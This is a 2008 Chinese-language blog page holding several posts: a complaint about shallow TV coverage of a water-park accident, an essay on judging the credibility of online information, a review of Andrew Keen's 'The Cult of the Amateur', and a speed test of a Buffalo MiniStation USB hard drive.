所謂專業人士的笑話, 實在是順手捻來 ... 罄竹難書吧!

昨天一則電視上報導水上樂園發生意外的新聞:

"在遊樂園遭抽水幫浦絞斷半截左掌及四根指頭的十一歲廖姓男童,昨天在加護病房見到探望他的父親時,第一句話竟是向父親道歉,讓廖父聽了一陣心酸。高雄醫學院表示,廖童的食指、中指恢復良好,但無名指、小指受傷嚴重,要再觀察一、兩周...二嬸、堂姊、乾爺爺多人,聚在加護病房玻璃落地窗外,輪流以對講機為廖童鼓勵,眼尖的廖童還問「妹妹呢?她有沒有哭?」廖母說妹妹下午會來看他,才平復廖童的不安..."

接著, 媒體鏡頭轉向男童的學校老師, 老師稱讚男童的勇氣 ...

看了這個報導, 當然為男童的遭遇不忍, 並且希望他早日康復, 但是正希望這則報導說明出事原因及出事地點的時候 ... 沒了

在各新聞台搜尋結果, 報導重點都是這位男童如何的勇敢...但是事件發生的原因是啥?是否該水上樂園的設施有問題?該水上樂園是否有處理這個抽水幫浦?該水上樂園的說法如何?其他人應該如何避免發生同樣的事件?

這則報導的"專業新聞工作者", 完全沒有做到平衡報導, 完全沒有報導廣大閱聽者希望知道的事情, 我已經知道這位可憐的男童很勇敢, 但我更希望知道, 到底其他人去該水上樂園遊樂, 應該如何避免發生同樣的不幸!

同樣的, 十億外交醜聞事件, 媒體報導金紀玖在美國的鄰居說: 人很少看到, 但他人看起來很好, 不像會做這種事情 ... 也都在專業的新聞媒體不斷的放送 ... (要不要也去採訪他堂哥的阿姨隔壁的大嬸?)

反而, 前陣子的虐貓事件, 因為愛貓人士在網路上搜尋線索, 並且鍥而不捨的追查, 終於將虐貓者揪出來法辦

不要說不專業的只有這些新聞媒體人, 老師、律師、法官、民意代表 ... 太多應該專業的人士, 其不專業的表現實在令人匪夷所思

在沒有Web 2.0的時代, 不專業人士的專業聲音沒有管道發聲, 只好讓這些專業人士繼續表演著不專業的笑話

在Web 2.0的時代, 雖說業餘教派有了發聲管道, 但也只是像料理鼠王一般, 一隻有著專業技能的老鼠, 默默的力爭上游 ...

標籤: ,

繼續閱讀:台灣搜尋引擎優化與行銷研究院

2008年5月2日星期五

他們不會知道你是一條狗


Peter Steiner:"On the Internet, nobody knows you’re a dog.”
(在網際網路上,沒有人會知道你是一條狗)

這是Peter Steiner的一幅漫畫, 一隻狗坐在電腦前面, 告訴另外一隻狗說: On the Internet, nobody knows you’re a dog.

這個漫畫所要表達的意思跟Andrew Keen(誰在看你的部落格?The Cult of the Amateur: How Today's Internet is Killing Our Culture.)所說的業餘教派的意思差不多, 本部落格也在上篇文章談過一些論點

當大家都可以在網路上發表文章時, 確實會造成一些問題, 有些時候who很重要, 有些時候who並不是那麼重要

什麼時候作者是誰並不重要?

這篇文章的作者就不重要 ... 認為有看的價值就看, 認為沒價值就走人, 是國小生寫的或是博士寫的, 是流浪漢寫的或是大老闆寫的, 一點關係也沒有!

一些技術文章的作者也不重要 ... 只要這個技術使用後, 真的可以work就好, 不能work就罵幾句走人, 管他是Bill Gates還是隔壁小王寫的!

什麼時候作者是誰相當重要?

當你看到說吃維他命過量會死人, 這種專業建議並且個人無法證實的內容, 是否真的專業人士寫的就很要緊, 而且要負責任的專業人士才能具有公信力

當你在網路上看到辣妹猛男照片, 進而想與對方聯絡進行男女交往, 這個作者的真實身份就很重要, 你如何知道你來往的對象到底是真的辣妹猛男本身, 還是一個詐騙集團? 網路上一堆集體式的曝露者, 到底誰是犯罪集團操縱下的陷阱?

但是又有些時候, 很難說作者是誰重不重要, 因為要看誰是閱聽者, 聰明的閱聽者能夠正確的判斷可信度, 但迷糊的閱聽者可能就不具備判斷力, 有時專業人士可能寫出一些烏龍文章, 而業餘者也可能寫出不錯的內容 ...

講了半天, 我到底在說啥?

重點只有一句話: 在網際網路時代, 具備快速判斷資料正確性的能力, 應該納入教育體系的重點

快速判斷資料正確性的能力, 說起來簡單, 但其背後可能就必須有各種知識的長期累積

如果能夠快速判斷資料正確性, 你才能夠在大量的網路資料中快速建立知識, 否則可能看越多資料, 結果更加的無知!

但是How? 一是你本身的實體閱讀(實體書本的閱讀)不能因為網路資料充足而降低, 畢竟實體書本的可信度會相對較高, 二是網路上的一些基本技能的增強, 因為網路上資料的可信度判斷, 有些需要一些網路知識

因此, 重拾傳統書本與增加網路常識是在這個茫茫網海中, 做出快速判斷資料正確性的唯二方法!

標籤: , ,

繼續閱讀:台灣搜尋引擎優化與行銷研究院

你在看誰的部落格? 是誤解還是事實?


早安財經於2008年四月三日出版了『你在看誰的部落格?』這本書,在當天就收到了早安財經的電子郵件,上面寫著很驚天動地的標題:

數位創業家基恩:長尾理論大錯特錯!Web 2.0應全面反思!

當時的直覺反應只有一個字: 『哇』

我到底在『哇』什麼呢? 光是看新書介紹,就把目前網路上大家所認知的潮流通通打翻,甚至於把網路上靠著長尾或Web 2.0賺到錢的人都批評得一無是處,真是有種!

這本書由Andrew Keen所著,原英文書名是: 『The Cult of the Amateur: How Today's Internet is Killing Our Culture』,在Amazon上可以看到對這本書的評論

寫到這裡,突然一笑

Andrew Keen所說的業餘教派 ... 我,正使用他所不屑的wikipedia向大家介紹他的資料,並且透過Amazon這個長尾的獲利者,把Web 2.0下的產物 - Amazon Reader Review來看大家對這本書的反應。

大概說的這裡,已經給Andrew Keen一個大巴掌了吧,但是請繼續往下看吧 ...

由於本人是很負責任的業餘教派(套用Andrew Keen的用詞),雖然我不以寫部落格維生(如果以此維生,早就餓死啦!),但是還是要用審慎的角度來看這本書所要表達的問題,所以忍痛去把這本書找來好好拜讀一番 ...

花了大約一個小時的時間,看完了這本書,再加上無數次的空檔來翻閱其中的重點,發現了一個作者自己都沒注意的主軸 ... Andrew Keen應該是一個『優生學的崇拜者』,或者說他應該是具有『大白種人主義』色彩,也就是他認為只有專業而優秀的人、事、物才有存在的價值,並且判斷哪些是專業而優秀,要由他來判斷。

Andrew Keen認為Web 2.0下,存在太多的垃圾,太多的假消息,這些垃圾浪費大家的時間,混淆了社會的真正價值觀。在目前網路Web 2.0與長尾現象下,業餘者已經讓專業生存空間越來越小 ...最後Andrew Keen提出了公民百科(Citizendium)、Joost、Brightcove、Guardian Unlimited、eMusic等等模式來解決問題。

其實,平心而論,Andrew Keen所敘述的現象都沒有錯,混亂確實是目前網路的現況,你可能接受了錯誤的網路資訊而不自知,你可能都在使用無版權的MP3,你的所有動作可能讓一家出版社或報社倒閉,一堆垃圾的存在可能讓真正的鑽石被掩蓋,完全不生產內容的Google、YouTube卻剝削了全部的利益 ...

如果用神的觀點來看Andrew Keen所說的網路世界,其實這些混亂只是正在演化,演化的結果讓適合的生存下來,不適合的就自然淘汰。當然不一定生存下來的都是最好的,只能說是最能適合生存的。

Andrew Keen的憂心是可以理解的,但是想要用少數人的人為作法來導正網路生態是困難的,除非這些少數的專家能夠建立比目前更嚴僅的模式,並讓廣大的使用者接受。

你在看誰的部落格? 是誤解還是事實? 應該說是對於網路現況的無奈下所出現的一本書!與其憂心垃圾充斥,不如對於網路門檻降低而高興,讓更多業餘者的參與,也可以激起專業者更加專業。

想要在目前網路下混口飯吃,門檻降低了,但困難度卻比以往更高了,這是一個好現象,不是嗎?

最後,還是蠻推薦大家去看看這本書,如果你只用書評就來判斷這本書,只能說你還不夠專業 ...

後記:
目前網路的亂像不就是所有網路創業家的天堂嗎?沒有這些亂像,網路創業家還能生出什麼模式來獲利呢?完全不事生產內容的Google就是靠解決這些問題而獲得認同,亂世出英雄啊,如果等網路一切循規蹈矩,機會就減少很多了 ...

標籤: , , ,

繼續閱讀:台灣搜尋引擎優化與行銷研究院

2008年5月1日星期四

Buffalo MiniStation 2.5吋500G測試報告


Buffalo Technology近日推出2.5吋500 GB Ministation turbousb攜帶式USB硬碟,提供了一個大容量/重量輕/抗衝擊的儲存解決方案。經過幾天的暴力測試,在傳輸速度/穩定度等表現,均在水準之上。

MiniStation內建高轉速高效能的2.5”SATA硬碟,除了高規格的日製硬碟外,MiniStation還採用了由BUFFALO獨自研發,全球首創的「TurboUSB技術」,讓實際傳輸速度可高達40MB/s。

MiniStation的Bumper Body外殼採用耐摔和減少撞擊力的材質,內部架構也加入了特殊材質來更加保護硬碟。而為讓常跑來跑去的使用者更方便攜帶,MiniStation的USB線可環繞著產品本身來收納,不會像其他品牌那樣一條線晃來晃去的,MiniStation還會隨附BUFFALO所獨有的Secure LockWare軟體來將您的檔案加密保存。

Buffalo MiniStation 2.5吋500G TurboUSB規格如下:
-介面:USB2.0 / 1.1
-upstream port:USB Mini-B socket
-sector容量:512Bytes
-seek time:13ms以下
-資料傳輸速度:USB2.0:最大480Mbps
-電源:USB BUS POWER(由電腦供應)
-電源管理:支援(WindowsXP SP1以上版本)
-消耗電力:最大2.5W
-外觀:W127×H83×D21mm(不包括突起部分)
-重量:約225g
-保固 : 全機兩年保固

在ASUS-D672 PC (Pentium D CPU 2.8G,1G RAM)Windows XP SP2平台下
經過ATTO Disk Benchmark測試結果如下

在未啟用Turbo USB前Write達到27MB/s,Read達到34MB/s,經enable TurboUSB之後,Write達到32MB/s,Read達到41MB/s,經過ATTO Disk Benchmark測試TurboUSB結果如下


並經過實際大量檔案傳輸下,傳輸速率都維持在20MB/s左右,並且機身不會因長期使用而發燙,因此在效能/尺寸/穩定度上,都算是相當不錯,目前價格大約在新台幣$9,500左右。

標籤: ,

繼續閱讀:台灣搜尋引擎優化與行銷研究院